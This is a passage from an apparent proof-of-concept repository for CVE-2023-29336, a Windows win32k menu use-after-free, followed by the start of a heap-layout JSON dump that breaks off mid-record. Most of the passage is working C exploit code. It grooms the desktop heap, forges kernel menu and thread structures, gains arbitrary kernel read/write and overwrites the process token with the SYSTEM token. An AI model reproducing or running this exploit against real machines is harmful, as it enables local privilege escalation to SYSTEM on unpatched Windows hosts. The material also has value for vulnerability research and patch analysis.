(wnd => 0x313230) 219 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0002 (wnd => 0x323030) 220 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0022 (wnd => 0x323230) 221 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0003 (wnd => 0x333030) 222 | * ... 223 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0015 (wnd => 0x353130) 224 | * ... 225 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0031 (wnd => 0x313330) 226 | * AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@0032 (wnd => 0x323330) 227 | */ 228 | 229 | WNDCLASSEX wc = { 0 }; 230 | /** 231 | * We increases total size of tagCLS to move corresponded allocation size to another next alignment section. 232 | * It prevents occuping of prepared seats. We left them for CLSNAME. 233 | * */ 234 | wc.cbClsExtra = 0x30; 235 | /** 236 | * We replaces victim tagMENU with tagCLS.lpszClassName. 237 | * szTemp has size of 0x98 (75 wchars + null term == 76 wchars, 238 | * 76 wchars * 2 == 0x98 bytes which will be alligned to 0xA0) 239 | */ 240 | wc.lpszClassName = szTemp; 241 | wc.cbSize = sizeof(WNDCLASSEXA); 242 | wc.lpfnWndProc = DefWindowProcW; 243 | wc.lpszMenuName = NULL; 244 | wc.hInstance = GetModuleHandleA(NULL); 245 | 246 | RegisterClassExW(&wc); 247 | } 248 | } 249 | 250 | int exploit() { 251 | // we use OOB write to overwrite RightGuard.spmenu field 252 | // +0x1A0 sizeof targetTagCLS 253 | // +0xC0 offset to spmenu field 254 | SetLastError(0); 255 | LONG_PTR result = SetClassLongPtr(g_exploitState.hwndm, 0x270, (LONG_PTR)&g_spmenu[0]); 256 | if (result == NULL && GetLastError() != ERROR_SUCCESS) { 257 | wprintf(L"[~][exploit] SetClassLongPtr() Failed with %d", GetLastError()); 258 | return -1; 259 | } 260 | // we read RightGuard window ThreadInfo 261 | // +0x250 sizeof targetTagCls 262 | // +0х10 offset to TI field 263 | PVOID p = Read64(SHIFT(g_exploitState.kptagCls, 0x260)); 264 | wprintf(L"[+][exploit] -> RGW.ti=%llx\n", p); 265 | 266 | // ETHREAD 267 | p = Read64(p); 268 | if (!p) { 269 | wprintf(L"[~][exploit] Reading ETHREAD was failed\n"); 270 | return 1; 271 | } 272 | wprintf(L"[+][exploit] -> ETHREAD=%llx\n", p); 273 | PVOID eprocess = Read64(SHIFT(p, 0x220)); 274 | if (!eprocess) { 275 | wprintf(L"[~][exploit] Reading EPROCESS was failed\n"); 276 | return 1; 277 | } 278 | wprintf(L"[+][exploit] -> EPROCESS=%llx\n", eprocess); 279 | p = Read64(SHIFT(eprocess, 0x2f0)); 280 | if (!p) { 281 | wprintf(L"[~][exploit] Reading of EPROCESS.ActiveProcessLinks failed\n"); 282 | return 1; 283 | } 284 | do { 285 | p = Read64(SHIFT(p, 0x08)); 286 | if (!p) { 287 | wprintf(L"[~][exploit] Reading of EPROCESS.ActiveProcessLinks.BLink failed\n"); 288 | return 1; 289 | } 290 | ULONG64 pid = (ULONG64)Read64(SHIFT(p, -0x08)); 291 | if (!pid) { 292 | wprintf(L"[~][exploit] Reading of EPROCESS.Pid failed\n"); 293 | return 1; 294 | } 295 | if (pid == 4) { 296 | PVOID pSystemToken = Read64(SHIFT(p, 0x68)); 297 | if (!pSystemToken) { 298 | wprintf(L"[~][exploit] Reading of EPROCESS.pSystemToken failed\n"); 299 | return 1; 300 | } 301 | printf("[+][exploit] -> pSystemToken=%llx \n", pSystemToken); 302 | 303 | bool fSetTokenStatus = false; 304 | Write64(SHIFT(eprocess, 0x358), (ULONG64)pSystemToken, fSetTokenStatus); 305 | if (!fSetTokenStatus) { 306 | printf("[+][exploit] -> Write64(): Failed \n", pSystemToken); 307 | return 1; 308 | } 309 | 310 | break; 311 | } 312 | } while (p != eprocess); 313 | 314 | // recover back spmenu 315 | result = SetClassLongPtr(g_exploitState.hwndm, 0x270, (LONG_PTR)NULL); 316 | 317 | return 0; 318 | }; 319 | 320 | void initfake(PVOID base, PVOID menu, PVOID target) { 321 | PVOID menuState = SHIFT(base, sizeof(My_tagTHREADINFO)); 322 | PVOID popupMenu = SHIFT(menuState, sizeof(My_tagMENUSTATE)); 323 | 324 | ptr_My_tagTHREADINFO fake_threadInfo = (ptr_My_tagTHREADINFO)base; 325 | fake_threadInfo->pMenuState = menuState; 326 | 327 | ptr_My_tagMENUSTATE fake_menuState = (ptr_My_tagMENUSTATE)menuState; 328 | 329 | fake_menuState->fFlags = 0x04; // fInsideMenuLoop value for condition in win32kfull!MNGetPopupFromMenu 330 | fake_menuState->pGlobalPopupMenu = popupMenu; 331 | fake_menuState->field_60 = 0; // fast exit from win32kfull!MNAnimate 332 | 333 | ptr_My_tagPOPUPMENU fake_popupmenu = (ptr_My_tagPOPUPMENU)popupMenu; 334 | fake_popupmenu->spmenu = menu; 335 | fake_popupmenu->spwndPopupMenu = target; 336 | } 337 | 338 | void setupfake(HMENU hMenu) { 339 | 340 | PVOID menu = g_pfnHMValidateHandle(hMenu, 2)->pSelf; 341 | 342 | wprintf(L"[?][setupfake] kpmenu=%llx\n", menu); 343 | 344 | PVOID umptr = VirtualAlloc((PVOID)0x300000, 0x100000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 345 | memset(umptr, 0x41, 0x100000); 346 | 347 | /** 348 | * Here we craft our fake structures 349 | */ 350 | PVOID fakebase = (PVOID)0x303030; 351 | for (int i = 0; i < 32; i++){ 352 | // here we allocate block for fake structure for each tagCLS reallocation 353 | PVOID umti = VirtualAlloc( 354 | NULL, 355 | 0x1000, 356 | MEM_COMMIT | MEM_RESERVE, 357 | PAGE_EXECUTE_READWRITE 358 | ); 359 | // fill data at destination addresses (tagCLS:NAME + 0x48) 360 | PVOID base = SHIFT(fakebase, ((i % 10) * 0x10000) + (i / 9) * 0x100); 361 | 362 | wprintf(L"[?][setupfake] base=%llx\n", (ULONGLONG)base); 363 | 364 | ptr_My_tagWND fake_tagWND = (ptr_My_tagWND)base; 365 | fake_tagWND->pti = umti; 366 | 367 | //-0x120 field offset 368 | // 0x60 tagcls offset 369 | // but we moved it on 3 bytes 370 | // to change the most significant 371 | // byte in cbClsExtra field 372 | initfake( 373 | umti, 374 | menu, 375 | SHIFT(SHIFT(g_exploitState.kptagCls, 0x63), -0x120) 376 | ); 377 | } 378 | }; 379 | 380 | void initprimitive() { 381 | const int allocationsCount = 0x100; 382 | 383 | HWND twindows[allocationsCount] = {0}; 384 | 385 | WNDCLASS wc = { 0 }; 386 | wc.lpfnWndProc = DefWindowProc; 387 | wc.lpszClassName = L"WindowClass#1"; 388 | wc.cbWndExtra = 0xe0; 389 | RegisterClass(&wc); 390 | 391 | for (int i = 0; i < allocationsCount; i++) { 392 | twindows[i] = CreateWindow(wc.lpszClassName, NULL, NULL, 0, 0, 0, 0, NULL, NULL, NULL, NULL); 393 | } 394 | 395 | HWND hMiddle = NULL; 396 | for (int i = 1; i < allocationsCount - 1; i++) { 397 | HWND pj = twindows[i - 1]; 398 | HWND j = twindows[i]; 399 | HWND nj = twindows[i + 1]; 400 | 401 | PTHRDESKHEAD kptrpj = g_pfnHMValidateHandle(pj, 1); 402 | PTHRDESKHEAD kptrj = g_pfnHMValidateHandle(j, 1); 403 | PTHRDESKHEAD kptrnj = g_pfnHMValidateHandle(nj, 1); 404 | 405 | ULONGLONG ndiff = abs((LONGLONG)kptrj->pSelf - (LONGLONG)kptrnj->pSelf); 406 | ULONGLONG pdiff = abs((LONGLONG)kptrpj->pSelf - (LONGLONG)kptrj->pSelf); 407 | 408 | wprintf(L"[?][initprimitive] j=%llx nj=%llx pj=%llx ndiff=%llx pdiff=%llx \n", (ULONGLONG)kptrj->pSelf, (ULONGLONG)kptrnj->pSelf, (ULONGLONG)kptrpj->pSelf, ndiff, pdiff); 409 | 410 | if (pdiff == 0x250 && ndiff == 0x250) { 411 | hMiddle = j; 412 | 413 | // save primitive setup 414 | g_exploitState.hLeftGuard = pj; 415 | g_exploitState.hRightGuard = nj; 416 | g_exploitState.kptagCls = kptrj->pSelf; 417 | break; 418 | } 419 | } 420 | 421 | if (hMiddle == NULL) 422 | return; 423 | 424 | DestroyWindow(hMiddle); 425 | 426 | WNDCLASSEXW targetWC = { 0 }; 427 | targetWC.lpfnWndProc = DefWindowProc; 428 | targetWC.lpszClassName = L"WindowClass#2"; 429 | targetWC.cbClsExtra = 0x1a0; 430 | targetWC.cbSize = sizeof(WNDCLASSEXA); 431 | targetWC.lpfnWndProc = DefWindowProcW; 432 | targetWC.hInstance = GetModuleHandleA(NULL); 433 | 434 | RegisterClassExW(&targetWC); 435 | 436 | for (int i = 0; i < allocationsCount; i++) { 437 | if (twindows[i] == g_exploitState.hLeftGuard || twindows[i] == g_exploitState.hRightGuard) 438 | continue; 439 | 440 | DestroyWindow(twindows[i]); 441 | } 442 | 443 | // set constants in extra data array of LeftGuard Window 444 | 445 | // first sets field_37 of tagWND inside extra data array of LeftGuard Window 446 | // it is checked in win32kfull!xxxRedrawWindow 447 | SetLastError(0); 448 | LONG_PTR result = SetWindowLongPtr(g_exploitState.hLeftGuard, 0x62, 0x1111111122222210); 449 | if (!result && GetLastError() != ERROR_SUCCESS) { 450 | wprintf(L"[!][initprimitive] SetWindowLongPtr(0x5a): Failed with %d\n", GetLastError()); 451 | } 452 | 453 | // second sets field_42 of tagWND inside extra data array of LeftGuard Window 454 | // it is checked in win32kfull!xxxRedrawWindow 455 | SetLastError(0); 456 | result = SetWindowLongPtr(g_exploitState.hLeftGuard, 0x6d, 0x29d); 457 | if (!result && GetLastError() != ERROR_SUCCESS) { 458 | wprintf(L"[!][initprimitive] SetWindowLongPtr(0x6d): Failed with %d\n", GetLastError()); 459 | } 460 | 461 | // third sets field_32 of tagWND inside extra data array of LeftGuard Window 462 | // it is checked in win32kfull!xxxRedrawWindow 463 | SetLastError(0); 464 | result = SetWindowLong(g_exploitState.hLeftGuard, 0x5d, 0x8); 465 | if (!result && GetLastError() != ERROR_SUCCESS) { 466 | wprintf(L"[!][initprimitive] SetWindowLongPtr(0x6d): Failed with %d\n", GetLastError()); 467 | } 468 | 469 | // fourth sets spwndParent of tagWND inside extra data array of LeftGuard Window 470 | // it is checked in win32kfull!xxxRedrawWindow 471 | // it prevents from crash inside InternalInvalidate2 472 | SetLastError(0); 473 | result = SetWindowLongPtr(g_exploitState.hLeftGuard, 0x83, (LONG_PTR)&g_spwndParent[0]); 474 | if (!result && GetLastError() != ERROR_SUCCESS) { 475 | wprintf(L"[!][initprimitive] SetWindowLongPtr(0x6d): Failed with %d\n", GetLastError()); 476 | } 477 | 478 | // we need additional window bind to target tagCls for OOB write 479 | // SetClassLongPtr() requires the HWND 480 | g_exploitState.hwndm = CreateWindow(targetWC.lpszClassName, NULL, NULL, 0, 0, 0, 0, NULL, NULL, NULL, NULL); 481 | } 482 | 483 | LRESULT CALLBACK wndproc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam) 484 | { 485 | switch(msg) { 486 | case WM_NCUAHDRAWCAPTION: { 487 | 488 | wprintf(L"[?] wndproc: msg=WM_NCUAHDRAWCAPTION wParam=%x lParam=%x\n", wParam, lParam); 489 | 490 | for (int i = GetMenuItemCount(g_hMenu_Top) - 1; i >= 0; i--) { 491 | RemoveMenu(g_hMenu_Top, i, MF_BYPOSITION); 492 | } 493 | wprintf(L"[+] 5. Destroy Menu\n"); 494 | system("pause"); 495 | 496 | DestroyMenu(g_hPopupMenu_A); // Here MenuA will be freed 497 | wprintf(L"[+] 6. Destroyed\n"); 498 | 499 | system("pause"); 500 | reallocMenu(); 501 | wprintf(L"[+] 6. Reallocated \n"); 502 | system("pause"); 503 | 504 | break; 505 | } 506 | } 507 | 508 | return DefWindowProc(hWnd, msg, wParam, lParam); 509 | } 510 | 511 | int 512 | __cdecl 513 | wmain( 514 | int argc, 515 | __in_ecount(argc) wchar_t* argv[]) 516 | { 517 | wprintf(L"[?][main] PID=%x\n", GetCurrentProcessId()); 518 | wprintf(L"[?][main] TID=%x\n", GetCurrentThreadId()); 519 | system("pause"); 520 | 521 | g_pfnHMValidateHandle = find_HMValidateHandle(); 522 | 523 | wprintf(L"[+][main] init RW primitive: STARTED\n"); 524 | ZeroMemory(&g_exploitState, sizeof(ExploitState)); 525 | initprimitive(); 526 | if (g_exploitState.kptagCls == NULL) { 527 | wprintf(L"[!][main] Failed to make primitive :-(\n"); 528 | return -1; 529 | } 530 | 531 | wprintf(L"[+][main] init RW primitive: OK\n"); 532 | wprintf(L"[+][main] -> LGW=%llx\n", g_exploitState.hLeftGuard); 533 | wprintf(L"[+][main] -> RGW=%llx\n", g_exploitState.hRightGuard); 534 | wprintf(L"[+][main] -> kptagCls=%llx\n", g_exploitState.kptagCls); 535 | 536 | WNDCLASS wc = { 0 }; 537 | wc.lpfnWndProc = wndproc; 538 | wc.lpszClassName = L"NormalClass"; 539 | RegisterClass(&wc); 540 | 541 | HWND hwnd = CreateWindow(wc.lpszClassName, NULL, WS_OVERLAPPEDWINDOW, CW_USEDEFAULT, CW_USEDEFAULT, 300, 100, NULL, NULL, NULL, NULL); 542 | if (NULL == hwnd) { 543 | wprintf(L"[~][main] CreateWindowExW(): Failed with %d\n", GetLastError()); 544 | return -2; 545 | } 546 | 547 | HMENU hSystemMenu = GetSystemMenu(hwnd, FALSE); 548 | if (NULL == DeleteMenu(hSystemMenu, g_wID, MF_BYCOMMAND)) 549 | { 550 | wprintf(L"[~][main] DeleteMenu(): Failed with %d\n", GetLastError()); 551 | return -2; 552 | } 553 | 554 | g_hMenu_Top = CreateMenu(); 555 | if (NULL == g_hMenu_Top) { 556 | wprintf(L"[~][main] CreateMenu(): Failed with %d\n", GetLastError()); 557 | return -3; 558 | } 559 | 560 | wprintf(L"[+][main] prepare win32k desktop heap: STARTED\n"); 561 | system("pause"); 562 | 563 | prepareHeap(); 564 | 565 | wprintf(L"[+][main] prepare win32k desktop heap: OK\n"); 566 | system("pause"); 567 | 568 | g_hPopupMenu_A = CreatePopupMenu(); 569 | if (NULL == g_hPopupMenu_A) { 570 | wprintf(L"[~][main] CreatePopupMenu(A): Failed with %d\n", GetLastError()); 571 | return -4; 572 | } 573 | 574 | wprintf(L"[+][main] setupfake structures: STARTED\n"); 575 | setupfake(g_hPopupMenu_A); 576 | wprintf(L"[+][main] setupfake structures: OK\n"); 577 | 578 | /* 579 | |---------| 580 | | SysMenu | <---- It gives us ability to callback inside xxxRedrawTitle 581 | |---------| 582 | | 583 | | 584 | ------>|---------| 585 | | Top | 586 | |---------| 587 | | 588 | | |---------| 589 | --->| MenuA | <----- UAF Target 590 | |---------| 591 | | 592 | | 593 | ------>|--------------| 594 | | | MenuB_Item1 | 595 | | |--------------| 596 | | |--------------| 597 | ------>| MenuB_Item2 | <---- Has system wID 598 | |--------------| 599 | 600 | */ 601 | 602 | AppendMenu(g_hPopupMenu_A, MF_STRING, (UINT_PTR)0x901, L"MenuB_Item1"); 603 | AppendMenu(g_hPopupMenu_A, MF_STRING, (UINT_PTR)g_wID, L"MenuB_Item2"); 604 | 605 | AppendMenu(g_hMenu_Top, MF_POPUP, (UINT_PTR)g_hPopupMenu_A, L"MenuA"); 606 | AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)g_hMenu_Top, L"Top"); 607 | 608 | ShowWindow(hwnd, SW_SHOW); 609 | UpdateWindow(hwnd); 610 | 611 | wprintf(L"[?][main] hwnd=%llx\n", hwnd); 612 | wprintf(L"[?][main] hmenu=%llx\n", g_hMenu_Top); 613 | wprintf(L"[?][main] hsysmenu=%llx\n", hSystemMenu); 614 | wprintf(L"[?][main] hpopupmenu(A)=%llx\n", g_hPopupMenu_A); 615 | 616 | wprintf(L"[+][main] --> win32kfull!xxxEnableMenuItem() <-- \n"); 617 | system("pause"); 618 | 619 | EnableMenuItem(hSystemMenu, g_wID, MF_DISABLED); 620 | 621 | exploit(); 622 | system(); 623 | 624 | MSG msg = { 0 }; 625 | 626 | while (GetMessage(&msg, NULL, 0, 0)) 627 | { 628 | TranslateMessage(&msg); 629 | DispatchMessage(&msg); 630 | } 631 | } -------------------------------------------------------------------------------- /cve-2023-29336/visualisation/src/prepare-heap-done.memorylayout.json: -------------------------------------------------------------------------------- 1 | {"HeapFirstEntry":"0xffffc8d5006006f0","HeapLastValidEntry":"0xffffc8d501a00000","Granularity":16,"Allocated":{"Objects":[{"Block":"0xffffc8d500600810","Type":"WINDOW","Handle":"0x10010","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061e5c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500600a50","Type":"WINDOW","Handle":"0x10012","Size":24,"UnusedBytes":20},{"Block":"0xffffc8d500600ca0","Type":"WINDOW","Handle":"0x10014","Size":26,"UnusedBytes":8},{"Block":"0xffffc8d50061f510","Type":"WINDOW","Handle":"0x40018","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006011d0","Type":"WINDOW","Handle":"0x1001c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006013c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500601730","Type":"WINDOW","Handle":"0x2001e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006018e0","Type":"WINDOW","Handle":"0x10020","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061eaf0","Type":"WINDOW","Handle":"0x20026","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061ed50","Type":"WINDOW","Handle":"0x20028","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50061f390","Type":"WINDOW","Handle":"0x20038","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006221f0","Type":"WINDOW","Handle":"0x4003a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e850","Type":"WINDOW","Handle":"0x2003c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061fe00","Type":"WINDOW","Handle":"0x20040","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006226d0","Type":"WINDOW","Handle":"0x2004e","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500622370","Type":"WINDOW","Handle":"0x30050","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500627850","Type":"WINDOW","Handle":"0x30052","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500621d70","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50061eef0","Type":"WINDOW","Handle":"0x30054","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d50061f0b0","Type":"WINDOW","Handle":"0x20056","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006036b0","Type":"INPUTCONTEXT","Handle":"0x2006b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500620100","Type":"WINDOW","Handle":"0x5006c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d5006279d0","Type":"WINDOW","Handle":"0x3006e","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500627ce0","Type":"WINDOW","Handle":"0x30070","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500617ac0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006020b0","Type":"INPUTCONTEXT","Handle":"0x2007b","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601b70","Type":"INPUTCONTEXT","Handle":"0x2007f","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601b00","Type":"INPUTCONTEXT","Handle":"0x20081","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601a90","Type":"INPUTCONTEXT","Handle":"0x20083","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500602040","Type":"INPUTCONTEXT","Handle":"0x100089","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500601e50","Type":"WINDOW","Handle":"0x40094","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500600f10","Type":"INPUTCONTEXT","Handle":"0x10095","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061ff80","Type":"WINDOW","Handle":"0x40096","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500602bf0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006022e0","Type":"INPUTCONTEXT","Handle":"0x80097","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006025d0","Type":"WINDOW","Handle":"0x20098","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500602100","Type":"WINDOW","Handle":"0x2009a","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500602d50","Type":"WINDOW","Handle":"0x1009c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500603000","Type":"WINDOW","Handle":"0x1009e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500603280","Type":"WINDOW","Handle":"0x100a0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500621700","Type":"INPUTCONTEXT","Handle":"0x300a1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500603520","Type":"WINDOW","Handle":"0x100a2","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500603810","Type":"WINDOW","Handle":"0x100a4","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500627b60","Type":"WINDOW","Handle":"0x300a6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061b1d0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500609aa0","Type":"WINDOW","Handle":"0x200a8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500603d80","Type":"WINDOW","Handle":"0x100aa","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060f670","Type":"INPUTCONTEXT","Handle":"0x300ab","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500603f40","Type":"WINDOW","Handle":"0x100ac","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500603ac0","Type":"INPUTCONTEXT","Handle":"0x100ad","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500604350","Type":"WINDOW","Handle":"0x100ae","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006045c0","Type":"WINDOW","Handle":"0x100b0","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500604860","Type":"WINDOW","Handle":"0x100b2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604d30","Type":"WINDOW","Handle":"0x200b4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500625d40","Type":"WINDOW:PROPLIST","Size":15,"UnusedBytes":8},{"Block":"0xffffc8d500604ed0","Type":"WINDOW","Handle":"0x100b6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500604ab0","Type":"INPUTCONTEXT","Handle":"0x100b7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605130","Type":"WINDOW","Handle":"0x200b8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500604b20","Type":"INPUTCONTEXT","Handle":"0x100b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605370","Type":"WINDOW","Handle":"0x100ba","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006050c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d5006055c0","Type":"WINDOW","Handle":"0x100bc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006092a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500604c00","Type":"INPUTCONTEXT","Handle":"0x100bd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605820","Type":"WINDOW","Handle":"0x100be","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006059e0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500620690","Type":"INPUTCONTEXT","Handle":"0x1500bf","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500605b30","Type":"WINDOW","Handle":"0x100c0","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609a50","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":24},{"Block":"0xffffc8d500605e40","Type":"WINDOW","Handle":"0x100c2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606040","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500608180","Type":"INPUTCONTEXT","Handle":"0x200c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006061e0","Type":"WINDOW","Handle":"0x100c4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606360","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500606440","Type":"WINDOW","Handle":"0x100c6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006065c0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500606640","Type":"WINDOW","Handle":"0x100c8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608350","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":24},{"Block":"0xffffc8d5006067e0","Type":"WINDOW","Handle":"0x100ca","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006069a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500609250","Type":"INPUTCONTEXT","Handle":"0x200cb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500606c90","Type":"WINDOW","Handle":"0x100cc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50060ab60","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500606e10","Type":"WINDOW","Handle":"0x100ce","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500607170","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500606ff0","Type":"WINDOW","Handle":"0x100d0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061d600","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500609ff0","Type":"INPUTCONTEXT","Handle":"0x200d1","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006071b0","Type":"WINDOW","Handle":"0x100d2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500606fb0","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500607420","Type":"WINDOW","Handle":"0x100d4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006075a0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006075d0","Type":"WINDOW","Handle":"0x100d6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006098b0","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500607790","Type":"WINDOW","Handle":"0x100d8","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500611e10","Type":"INPUTCONTEXT","Handle":"0x300d9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500607980","Type":"WINDOW","Handle":"0x100da","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609900","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d500607c30","Type":"WINDOW","Handle":"0x100dc","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061e280","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500607db0","Type":"WINDOW","Handle":"0x100de","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609860","Type":"WINDOW:PROPLIST","Size":5,"UnusedBytes":8},{"Block":"0xffffc8d50060ae20","Type":"INPUTCONTEXT","Handle":"0x100df","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500607fd0","Type":"WINDOW","Handle":"0x100e0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d5006097b0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006081d0","Type":"WINDOW","Handle":"0x100e2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608390","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d5006083c0","Type":"WINDOW","Handle":"0x100e4","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500609820","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500615320","Type":"INPUTCONTEXT","Handle":"0x400e5","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500608580","Type":"WINDOW","Handle":"0x100e6","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d50061aac0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50060c980","Type":"INPUTCONTEXT","Handle":"0x300e7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500608750","Type":"WINDOW","Handle":"0x100e8","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500608700","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d50060cb50","Type":"INPUTCONTEXT","Handle":"0x100e9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006088d0","Type":"WINDOW","Handle":"0x100ea","Size":2